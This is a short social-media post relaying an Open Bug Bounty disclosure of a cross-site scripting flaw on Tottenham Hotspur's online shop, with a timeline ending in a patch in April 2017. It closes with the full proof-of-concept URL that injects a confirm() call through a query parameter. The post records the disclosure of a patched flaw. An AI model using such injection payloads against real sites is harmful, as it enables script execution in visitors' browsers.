@SpursOfficial ‏#XSS

https://www.openbugbounty.org/incidents/226789/

Notification & Disclosure Timeline

22 April, 2017 at 13:27 GMT Vulnerability reported via Open Bug Bounty
24 April, 2017 at 04:33 GMT Vulnerability verified and confirmed
24 April, 2017 at 06:17 GMT Notification sent to subscribers (without technical details)
26 April, 2017 at 09:32 GMT Vulnerability Patched

XSS URL :[startCodeBlock]http://shop.tottenhamhotspur.com/detailfash.php?branch=&code=MF01AW09‘ -confirm(`OPENBUGBOUNTY`)-‘&super=CAT00062&supercategory=CAT00062&type =FASH&wcategory=#[endCodeBlock]